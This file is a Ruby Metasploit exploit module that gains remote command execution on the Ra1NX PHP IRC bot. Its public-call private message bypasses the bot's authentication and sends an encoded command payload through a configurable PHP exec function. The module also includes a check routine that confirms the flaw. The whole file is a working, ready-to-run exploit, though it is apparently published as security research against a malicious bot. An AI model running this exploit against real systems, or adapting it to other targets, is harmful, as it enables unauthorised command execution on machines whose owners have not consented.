##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
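class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Longest nickname the module will register with; a longer NICK is replaced
  # by a random one of this length in #register.
  MAX_NICK_LENGTH = 9

  # IRC numerics that mean our registration was refused:
  # 463 ERR_NOPERMFORHOST and 464 ERR_PASSWDMISMATCH (RFC 1459).
  REGISTRATION_REFUSED = /463|464/

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',
      'Description'    => %q{
          This module allows remote command execution on the PHP IRC bot Ra1NX by
        using the public call feature in private message to covertly bypass the
        authentication system.
      },
      'Author'         =>
        [
          'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '91663'],
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 344,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'        =>
        [
          ['Ra1NX / Unix',    { 'Platform' => 'unix' } ],
          ['Ra1NX / Windows', { 'Platform' => 'win' } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-03-24',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
      ])
  end

  # The module may present a credential (IRC_PASSWORD) to the server, so it
  # declares itself as a post-auth module.
  def post_auth?
    true
  end

  # Opens the TCP connection to RHOST:RPORT and drains the server greeting.
  # If the greeting contains the "020 ... wait" notice the server is still
  # processing the new connection, so the module pauses 3 seconds before the
  # caller goes on to register.
  def connect_irc
    print_status("#{rhost}:#{rport} - Connecting to IRC server...")
    connect

    greeting = read_until_quiet(sock)

    if greeting =~ /020.*wait/
      print_good("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")
      select(nil, nil, nil, 3)
    end
  end

  # Connects, registers, and asks the bot (via the public-call "@msg" command)
  # to echo a random token back to our own nick. Seeing the token in the
  # server's reply means the bot executed an unauthenticated command.
  #
  # @return [Exploit::CheckCode] Unknown when the server refused our
  #   registration, Vulnerable when the token was echoed, Safe otherwise
  def check
    connect_irc

    response = register(sock)
    if registration_refused?(response)
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      # Close the socket on this early exit too, not only on the happy path.
      disconnect
      return Exploit::CheckCode::Unknown
    end

    confirm_string = rand_text_alpha(8)
    # The echo must be addressed to the nick we actually registered with:
    # #register may have substituted a random nick when NICK was too long.
    response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{@irc_nick || datastore['NICK']} #{confirm_string}\r\n")

    quit(sock)
    disconnect

    if response.include?(confirm_string)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes +data+ to +sock+ and returns everything the server sends back
  # before the connection goes quiet (see #read_until_quiet).
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @param data [String] raw IRC line(s), CRLF-terminated
  # @return [String] the collected reply, possibly empty
  def send_msg(sock, data)
    sock.put(data)
    read_until_quiet(sock)
  end

  # Sends the PASS (if IRC_PASSWORD is set), NICK and USER registration lines.
  # Nicks longer than MAX_NICK_LENGTH are replaced by a random one; the nick
  # actually used is remembered in @irc_nick for later messages.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] the server's reply to the registration burst
  def register(sock)
    msg = ""

    password = datastore['IRC_PASSWORD']
    msg << "PASS #{password}\r\n" if password && !password.empty?

    nick = datastore['NICK']
    if nick.length > MAX_NICK_LENGTH
      nick = rand_text_alpha(MAX_NICK_LENGTH)
      # Non-fatal: registration proceeds with the substitute nick.
      print_warning("The nick is longer than #{MAX_NICK_LENGTH} characters, using #{nick}")
    end
    @irc_nick = nick

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Delivers the encoded command payload to the bot through the public-call
  # syntax ("@<PHP_EXEC> <payload>") in a private message.
  #
  # @param sock [Rex::Socket] connected and registered IRC socket
  # @return [String] the server's reply, if any
  def ra1nx_command(sock)
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{payload.encoded}\r\n"
    send_msg(sock, command_msg)
  end

  # Sends the IRC QUIT command; the caller is responsible for #disconnect.
  #
  # @param sock [Rex::Socket] connected IRC socket
  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect_irc

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if registration_refused?(response)
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      # Release the socket before bailing out.
      disconnect
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
    ra1nx_command(sock)

    quit(sock)
    disconnect
  end

  private

  # True when the server's reply to our registration carries a refusal numeric.
  #
  # @param response [String] reply collected by #register
  def registration_refused?(response)
    response.match?(REGISTRATION_REFUSED)
  end

  # Reads from +sock+ until a 1-second read returns nothing, or the peer closes
  # the connection, and returns everything received as one string. EOF is not
  # treated as an error here because callers only inspect what was collected.
  #
  # @param sock [Rex::Socket] connected socket
  # @return [String] all data read, possibly empty
  def read_until_quiet(sock)
    data = ""
    begin
      while (chunk = sock.get_once(-1, 1))
        data << chunk
      end
    rescue EOFError
      # Peer closed the connection; hand back what was read so far.
    end
    data
  end
end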